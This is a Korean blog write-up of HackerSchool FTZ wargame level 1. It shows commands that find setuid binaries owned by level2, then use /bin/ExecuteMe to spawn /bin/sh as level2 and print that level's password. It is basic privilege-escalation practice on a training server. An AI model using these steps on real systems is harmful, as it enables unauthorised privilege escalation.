티스토리 뷰
level1 / level1 을 쳐서 level1로 접속한다.
level1에 접속하여 무슨 파일과 디렉토리가 있는지 확인한다.
[level1@ftz level1]$ ls -al
total 88
drwxr-xr-x 4 root level1 4096 Jan 16 2009 .
drwxr-xr-x 34 root root 4096 Sep 10 2011 ..
-rw------- 1 root root 1 Jan 15 2010 .bash_history
-rw-r--r-- 1 root root 24 Feb 24 2002 .bash_logout
-rw-rw-r-- 1 root root 224 Feb 24 2002 .bash_profile
-rw-r--r-x 1 root root 151 Feb 24 2002 .bashrc
-rw-r--r-- 1 root root 400 Feb 24 2002 .cshrc
-rw-r--r-- 1 root root 4742 Feb 24 2002 .emacs
-rw-r--r-- 1 root root 162 Feb 24 2002 .epems
-r--r--r-- 1 root root 319 Feb 24 2002 .gtkrc
-rw-r--r-- 1 root root 100 Feb 24 2002 .gvimrc
-rw-r--r-- 1 root root 47 Apr 4 2000 hint
-rw-r--r-- 1 root root 226 Feb 24 2002 .muttrc
-rw-r--r-- 1 root root 367 Feb 24 2002 .profile
drwxr-xr-x 2 root level1 4096 Dec 7 2003 public_html
drwxrwxr-x 2 root level1 4096 Jan 16 2009 tmp
-rw-r--r-- 1 root root 1 May 7 2002 .viminfo
-rw-r--r-- 1 root root 4145 Feb 24 2002 .vimrc
-rw------- 1 root root 106 Mar 6 2000 .Xauthority
-rw-r--r-- 1 root root 245 Feb 24 2002 .Xdefaults
hint 라는 파일이 보인다.hint 파일을 읽어보면
[level1@ftz level1]$ cat hint
level2 권한에 setuid가 걸린 파일을 찾는다.
level2 권한에 setuid가 걸린 파일을 찾기 위해선 trainer10에서 배운 find 명령을 사용한다.
[level1@ftz level1]$ find / -perm +6000 -user level2 2> /dev/null
/bin/ExecuteMe
-perm +6000이라는 옵션은 level2 권한과 level1의 그룹 권한 중 하나라도 SUID가 설정된 파일을 찾는다는 의미이다.
2> /dev/null라는 것은 에러가 발생된 결과는 모두 버린다는 뜻이다.
만약 2> /dev/null을 치지 않는다면 에러가 발생한 결과도 모두 출력한다.
[level1@ftz level1]$ find / -perm +6000 -user level2
find: /lost+found: Permission denied
find: /boot/lost+found: Permission denied
find: /proc/1/fd: Permission denied
find: /proc/2/fd: Permission denied
find: /proc/3/fd: Permission denied
find: /proc/4/fd: Permission denied
find: /proc/9/fd: Permission denied
find: /proc/5/fd: Permission denied
find: /proc/6/fd: Permission denied
find: /proc/7/fd: Permission denied
find: /proc/8/fd: Permission denied
find: /proc/10/fd: Permission denied
find: /proc/11/fd: Permission denied
find: /proc/19/fd: Permission denied
find: /proc/77/fd: Permission denied
find: /proc/1168/fd: Permission denied
find: /proc/1481/fd: Permission denied
find: /proc/1538/fd: Permission denied
find: /proc/1542/fd: Permission denied
find: /proc/1560/fd: Permission denied
find: /proc/1579/fd: Permission denied
find: /proc/1646/fd: Permission denied
find: /proc/1683/fd: Permission denied
find: /proc/1717/fd: Permission denied
find: /proc/1726/fd: Permission denied
find: /proc/1736/fd: Permission denied
find: /proc/1745/fd: Permission denied
find: /proc/1754/fd: Permission denied
find: /proc/1801/fd: Permission denied
find: /proc/1809/fd: Permission denied
find: /proc/1832/fd: Permission denied
find: /proc/.1833/fd: Permission denied
find: /proc/.1834/fd: Permission denied
find: /proc/.1835/fd: Permission denied
find: /proc/.1836/fd: Permission denied
find: /proc/.1837/fd: Permission denied
find: /proc/.1838/fd: Permission denied
find: /proc/.1839/fd: Permission denied
find: /proc/.1840/fd: Permission denied
find: /proc/1884/fd: Permission denied
find: /proc/1885/fd: Permission denied
find: /proc/1886/fd: Permission denied
find: /proc/1887/fd: Permission denied
find: /proc/1888/fd: Permission denied
find: /proc/1889/fd: Permission denied
find: /proc/1890/fd: Permission denied
find: /proc/1893/fd: Permission denied
find: /proc/2900/fd: Permission denied
find: /proc/2902/fd: Permission denied
find: /var/lib/slocate: Permission denied
find: /var/lib/nfs/statd: Permission denied
find: /var/lib/dav: Permission denied
find: /var/lib/mysql/mysql: Permission denied
find: /var/lib/mysql/test: Permission denied
find: /var/lib/pgsql: Permission denied
find: /var/log/httpd: Permission denied
find: /var/log/squid: Permission denied
find: /var/log/samba: Permission denied
find: /var/cache/mod_ssl: Permission denied
find: /var/cache/alchemist/printconf.rpm: Permission denied
find: /var/cache/alchemist/printconf.local: Permission denied
find: /var/run/sudo: Permission denied
find: /var/spool/at: Permission denied
find: /var/spool/clientmqueue: Permission denied
find: /var/spool/mqueue: Permission denied
find: /var/spool/cron: Permission denied
find: /var/spool/squid: Permission denied
find: /var/empty/sshd: Permission denied
find: /var/tux: Permission denied
find: /etc/sysconfig/pgsql: Permission denied
find: /etc/default: Permission denied
find: /etc/httpd/conf/ssl.crl: Permission denied
find: /etc/httpd/conf/ssl.crt: Permission denied
find: /etc/httpd/conf/ssl.csr: Permission denied
find: /etc/httpd/conf/ssl.key: Permission denied
find: /etc/httpd/conf/ssl.prm: Permission denied
find: /root: Permission denied
find: /usr/share/ssl/CA: Permission denied
/bin/ExecuteMe
find: /home/clear: Permission denied
find: /home/level10/program: Permission denied
find: /home/level5/tmp: Permission denied
find: /home/trainer1: Permission denied
find: /home/trainer10: Permission denied
find: /home/trainer2: Permission denied
find: /home/trainer3: Permission denied
find: /home/trainer4: Permission denied
find: /home/trainer5: Permission denied
find: /home/trainer6: Permission denied
find: /home/trainer7: Permission denied
find: /home/trainer8: Permission denied
find: /home/trainer9: Permission denied
cd라는 명령을 이용해서 /bin/ExecuteMe로 가보면
[level1@ftz level1]$ cd /bin/ExecuteMe
-bash: cd: /bin/ExecuteMe: Not a directory
라고 뜬다. 이것으로 ExecuteMe는 디렉토리가 아니다.
[level1@ftz level1]$ cd /bin
[level1@ftz bin]$
라고 압력하여 bin 경로로 간 후 ExecuteMe파일을 열면
[level1@ftz bin]$ ./ExecuteMe
레벨2의 권한으로 당신이 원하는 명령어를
한가지 실행시켜 드리겠습니다.
(단, my-pass 와 chmod는 제외)
어떤 명령을 실행시키겠습니까?
[level2@ftz level2]$
my-pass와 chmod를 제외시키고 명령을 한가지 실행 시켜준다고 했다.
따라서 level2 계정의 권한을 지속적으로 유지할 수 있게 하는 명령어인 셸 명령어 sh, bash, /bin/sh, /bin/bash 를 치면 된다.
[level1@ftz bin]$ ./ExecuteMe
레벨2의 권한으로 당신이 원하는 명령어를
한가지 실행시켜 드리겠습니다.
(단, my-pass 와 chmod는 제외)
어떤 명령을 실행시키겠습니까?
[level2@ftz level2]$ /bin/sh
sh-2.05b$ my-pass
Level2 Password is "hacker or cracker".
level2의 비밀번호를 얻었다!!!!
'Pwnable > FTZ level' 카테고리의 다른 글
[hackerschool FTZ] level6 (0) | 2016.12.27 |
---|---|
[hackerschool FTZ] level5 (0) | 2016.12.27 |
[hackerschool FTZ] level4 (0) | 2016.12.26 |
[hackerschool FTZ] level3 (0) | 2016.11.13 |
[hackerschool FTZ] level2 (0) | 2016.11.10 |